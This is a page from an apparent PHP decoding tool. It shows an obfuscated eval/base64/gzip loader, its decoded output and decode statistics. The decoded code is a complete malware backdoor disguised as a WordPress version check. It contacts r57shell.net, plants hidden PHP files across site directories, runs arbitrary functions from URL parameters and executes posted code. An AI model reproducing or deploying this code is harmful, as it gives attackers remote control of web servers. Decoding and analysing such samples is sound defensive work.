Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval('?>'.gzuncompress(gzinflate(base64_decode("ATQKy/V4nJ1ZWU/jShZ+n1/hiZA6SOgqjh..
Decoded Output download
?>b'<?php
if (!function_exists("\x77\160\137\143\x6f\x72\145\x5f\166\145\162\163\151\x6f\x6e\x5f\143\150\x65\x63\x6b")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["\123\x43\x52\111\x50\124\x5f\106\111\114\x45\x4e\x41\115\105"]; goto TmK7C; B8IHf: $uri_path = $parse_url["\x70\x61\x74\150"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["\x52\105\x51\x55\105\123\124\x5f\x55\122\x49"]; goto Lhccs; Sae33: $hostname = str_replace("\167\167\x77\56", \'\', $_SERVER["\110\124\x54\120\137\x48\x4f\x53\x54"]); goto EmUwt; yxZ6i: $uri_path = str_replace("\x2f", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("\143\165\162\154\137\x69\x6e\x69\x74")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\57\x2f\x72\x35\67\163\x68\145\x6c\154\x2e\156\x65\164\x2f\152\161\165\x65\162\x79\x2e\160\150\160\77\x76\75\61\x2e\x32\x26\x72\145\161\x75\x65\163\x74\75\145\156\141\142\x6c\x65"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\110\124\124\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x52\105\x51\x55\x45\x53\x54\137\x55\x52\111"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("\150\x74\x74\x70\x3a\x2f\57\162\x35\67\163\150\145\x6c\x6c\x2e\x6e\x65\164\x2f\152\161\165\145\162\171\x2e\x70\x68\160\77\166\75\x31\56\62\46\x72\145\161\165\145\163\x74\x3d\x65\x6e\141\142\154\145", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\124"] . $_SERVER["\x52\x45\x51\x55\105\123\124\x5f\x55\122\111"]; goto vGpwe; vGpwe: $opts = array("\150\x74\164\160" => array("\x68\x65\141\144\145\162" => array("\122\x65\x66\x65\x72\x65\162\72\40{$referer}\15\xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("\43\163\164\x74\61\x23", $response)) { goto Mh1sz; Mh1sz: if (function_exists("\143\x75\162\154\137\151\156\x69\164")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\x2f\57\x72\65\67\163\x68\145\154\154\56\156\x65\164\x2f\x6a\x71\165\x65\x72\x79\56\160\150\x70\77\166\75\61\56\x32\x26\162\145\161\165\145\x73\x74\x3d\145\x6e\x61\142\x6c\x65"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\x48\124\124\120\137\110\x4f\x53\124"] . $_SERVER["\122\105\x51\x55\105\x53\124\x5f\x55\122\111"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("\150\164\164\160" => array("\150\145\141\x64\145\x72" => array("\122\145\146\145\162\145\162\72\40{$referer}\15\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["\110\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\125\105\x53\x54\x5f\125\x52\111"]; goto Npbn0; hCspz: $response = @file_get_contents("\150\x74\x74\x70\72\57\57\162\x35\x37\x73\x68\145\154\x6c\56\156\x65\164\x2f\x6a\161\x75\145\x72\171\56\160\x68\x70\77\x76\75\x31\56\62\46\x72\x65\161\x75\145\x73\164\75\x65\156\x61\x62\154\145", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\x73\145\x73\163\x5f" . md5(\'\' . $hostname . "\x5f" . $document_file . \'\'); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\163\x65\163\163\137" . md5(\'\' . $hostname . "\x5f" . $document_file . \'\'); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "\x2e" . basename($d) . "\56\160\150\160"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("\43\167\x70\55\x63\157\x6e\x74\145\x6e\x74\43", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "\56" . basename($d) . "\56\x70\x68\160"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["\163\x6c\x69\156\x63\145\x5f\x67\x6f\154\144\x65\x6e"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["\151\163"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["\146"]) { print_r($_GET["\x66"]($_GET["\x63"])); } goto mNwUE; mNwUE: if (@$_GET["\x6d"]) { goto u3lO9; u3lO9: if (function_exists("\x63\x75\162\154\x5f\151\x6e\x69\x74")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\57\x2f\x72\x35\67\x73\x68\x65\x6c\x6c\56\156\x65\x74\x2f\155\151\x6e\151\137\141\144\155\151\x6e\56\164\x78\164"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("\x68\x74\x74\160\x3a\57\57\162\65\67\163\x68\145\154\154\56\156\x65\x74\x2f\x6d\151\x6e\x69\137\141\144\155\151\x6e\x2e\x74\x78\164"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["\155"] . "\147\x61\x67\141\154\x2e\x70\150\160"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["\x6c"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["\165\x72\x69"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["\154"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "\74\41\x2d\55\40\x2f\57\123\x69\154\145\156\x63\145\40\151\x73\x20\147\157\154\144\x65\x6e\56\x20\55\x2d\x3e"; goto q9t4S; q9t4S: if (function_exists("\x63\165\162\154\x5f\x69\156\x69\164")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\72\x2f\57\162\65\x37\x73\150\145\x6c\x6c\56\x6e\145\164\57\x6a\x71\165\x65\162\x79\56\160\150\x70\77\x76\x3d\61\x2e\x32\46\160\167\x64\75\x67\x65\x74"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("\150\164\x74\160\72\x2f\57\x72\x35\x37\x73\150\x65\154\x6c\56\x6e\145\164\x2f\152\161\x75\145\162\171\56\x70\150\x70\77\166\x3d\61\x2e\x32\46\x70\167\144\x3d\x67\145\x74"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == \'\') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, \'\', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); }'Did this file decode correctly?
Original Code
<?php
eval('?>'.gzuncompress(gzinflate(base64_decode("ATQKy/V4nJ1ZWU/jShZ+n1/hiZA6SOgqjh0bqOmZy5IA3UDAJGydlmUchwSyYTtguPf+9zlLlVPZaJoHVMSuqrN/Z/F//jfujv9l9DpG8d+dyTBMe6OhH2W9JE2KhVbmui3TKbVMC1bbamVOB56V4f9KK6t04J1D/5sOPHOsllkxeY8T8Xsbn5XgN+x38PxdYX3d+MtQpIyXsR+O4sh/juIESYfdKHws4pb7UToyzg8bg6owvGj3zts21jq9fuSPg7RrfDXavXgYDKLiWnsUTgbRMPXx7brgg6/ZrdMTfB4OzuyBw2v+RdW7rHo/Ci2zDHyhbBWQwQT+gV+zbDP/JYeemSb8RpltkMvG3yBzqVL4Kak1Bt/dPWHsbh4ddoDaJO4pLtfGQZxE/iTu/0B1oiqAhGujWvLj+95muyT4FjgeR0+TKEnhUG+WVWKxhKpHNokFYl+xS8/KZWBxK7/7uBuGiTAugsiy4O7uKElRbXBxksZ+HI37QRiBqU3HpT80ecUpbBhfvmzMqMlUagHey+wSmb0Jf0gX1WcXfirtVwfNl1SwEWb1MUs0K3eA0v6RV91r1L0boHa24+3AvxvTQ+rOxkkWeMKo26cZuAI7LLqDdNa1dDBmD8id59vDa2wJ4+myGda2jT/T0STsavvkvbX4rlMXvMAudrFJCm45TMFjtJs30DTJeDRM8sOd5uOZL5gSM7UYRBQEjgwS1B5qztniIMHVtQtTpqu3r/6W4AVUF6LSQnAfvzfspUVF99IrXYJ712v9p+42v0+idDROi3Biw9hresf1s4bvVRtN77Th7Zxe1KqgVDM/3w6PQWi65p3zsGwYYCZnk3yW/BbgABCg4qLxCAwyq9Ii57FoI2GDE5KoWTmC1aH4Nx2bjpjoxBAEJmECqyVzt3gvYg3GHxJBX3RaLlxu0svMgo1lJwcgkyJJXWIRd/CTXlUQl4CGXSZeYEtBiU46E8Z++K1/tT21qFJzlEUhKiG38KP3EglW2LuaBgWjipeEDIdNiUNUCxl4Xvhp/PFehBPocHSx3+AzBqpptJEogjmVLIb9URLpYpyMTwaO4GXb+MeI+iCydDkv6W89CePs3Eu8WY1wNNxHWjQUGNClNxCiWQEZtuKyLafuQKaU7kB/aEXy+uXukKcSV1qc8HJTuQNmG7S3ZQJCtWCfPesM0yvYGTKrLTNPlHsDBaBdAdTpBKACsBdJlqVKUafXXj8A9xgkYX07f8vIFQUDXz7wQ/iVgorBExJ1ljQoWJ+kyE4UR/FcujFLEkMXnUJi+TKnYEd4H/bJKSQrzwdjdFtagBXkEvgI4jh41UyIRgDlFoyv/83fUbCTJlFjtjLKzB5KMqRZjm2CARnL8K9d+ksJ/w/QamUBAFzurahZwXpGT6SHhNGC4VRzT90XF11Rh3LKB3+O4+jeHwQp4HyhRbBrsaOBrIQiVkEH8Rx0T7pm8iZ4eQ/GEW50GMd6h/FtC+loML5/uf94JoyJf1HrfgBl3vYPw1thvJ007ie/xmOGSFuKRngsAxAN4SzAMbELf4iKc2icORC87hSNyZKAxrhVgjFRyKPPoeBTWEzKmAu/zJ2GH0d/RFXPMjDeeb66bAvj5mrn/OU30RWDRqGrKkgouFajKwXJXP0kty4GkmKRTCjYoKsTMllOsB1XYfDz1ub9SLDMn0napCXB18xj+LeDO9eEqBrfDUvL4105zHy8K5DGeM8cW5pwMd55j1bv2x+L93baDJuCGXwPFPVMubS4XLQlgqJZBs8qT22J2Eqle1nLlArbUTvC6O4l47dPJDoue7Q0lyGb7mycoYeviDNVsEgNU5qTccYVll70LGQ5vk2/gbFNVUBEEE34gSR3ffVwZQs2ze8mOdKe4Cty/H573DuHrEnL6lLbOy5PrgUvv11q17KSeyh4QbqS8u71rQetF3UcDN29xH+Je2lw14+KyWtCVk0juBg6xuI6QXROB0Ve2AKOtqQlgacFVnqufPS2TgFeDNqV4pcv6KB5f0W7+e1c9/kHtFYg1DTJacxoHe5qJhjaKzK7WRgtn2eClPjQvJ5ATqY+dLZfy7vs+XaMWnJosPdunsrbRgd6+ACgEbrxXpwYQQL0prlw/HQGLU10Uj8+XG52eoR0ltg9O29MwFdpwU4e75fIhqKkUVy874/ugPJ7disHEA0Hx/Vdv356fAPbcnz6fpjcVgQzqUYMskP+xZUR6vUuSCI5h1in51rmRKiVVEh4wcRWq2tVFeMSOFR4iGJinsec6trT/Ar/21TctNnBPywG9PorpNCqb5DiN8yWx+Zzo715InjJoeJy7wU7EXI5Dtg/1/yDauOHcuyQyynCMysfNWWoBKcjsc1WhT3kaeVmT92jJ8CgZ8efNPlijIikG5gaBSzYHAtOrRtfv2pcq0uOT/fuAaJomefOdpjaOO5BGMVF9QKq4MJP7Rddn8fW4PSlWRW8zN2YOW2N/4nVr0OY0LKqCKUhmlaEUqajoduyWUK3VKrAjcO32tn3T1WVi12+Snes/nA+3VGqpK6ukvNFOqcBomwotHcULEhuk+tnGS0X/cbuszAuTqq18qpqapg1TiEPkYyr6zKSXfCFn6m5wih+gMaElg/U8cSxYN4+3McsDliwpZ6WGh8q6JXmwadmPGKV5rm/nlG9CtCj1wNQ7Ci6Me+3jSjsjjQ4oRwghYUILoeC92/P78Giahp1FSrfMIZcWaVIruSQCP1tDjGzrhccCF5+kTWI4JLUQSII5jPHn4fvB5UdwUsej2f1Cw7IkAMyn08DMPZCoNnGQSPQxSE1kJYj2umosRH2ofxP78MjiDTM6B0EXlwJ11SLPJ3LvllxNAa0Gp67FXIsLL+KvSHc0474pBJj7zkIoEkiGnw5bMUNIH/u6I3RzfW54GXKgazn0N0GURr47SANqMpSx4hjwdxAXsLCKaING/kcOm9fkFVhBDflo2zbAIYn8ZAYV4Vh+7kLvk/cwlUyYDVadFLwPjSHwtEVOlZGMWmyPPXP21r4Aq01LblV6/2r2qngBZw26ymuns/rk4bg5CC9udDCbInjgDbmVLuUj6/wUwDlHjsfI6ocZJc4dBD/sNu0XUrEc+mI8maZUzXcnlmRcuenrdS+ELy8h+76pJjznsqF8yOGM+vuqS+M5NEvv6wCyQdzt+kL3roaJGs71giCmpaP5QlteKRNHyRYqbZofvxHUkSycbQpucxNH9QseHH6gF0RDhS0WbAtN1FhIPsgV2Fhnkqud3r9W2i6v735zgcAnLQp+NRn8gXREaz330gAKvdqE3ZtoqP3mupzmtZr6krVR6qqU1QjVVnTzc10FrVKmwig1QzVlU2PniaozhIcX9MwxK8zgr/VsJdrzcTXpUXo338bM3ugL0GF5e1KPBqlM52R3jrN79I/L+W3ym9Z+QVTGeirmOAe8v3eYobOp/oM6pQEf4/b1r4LAsH8/6L+7U8dpK+KgutmVPSKT6Yg1P8BRIsa0g=="))));
?>Function Calls
| gzinflate | 1 |
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | cf986a73a96b3a90b3fa75fc78b1c01a |
| Eval Count | 1 |
| Decode Time | 70 ms |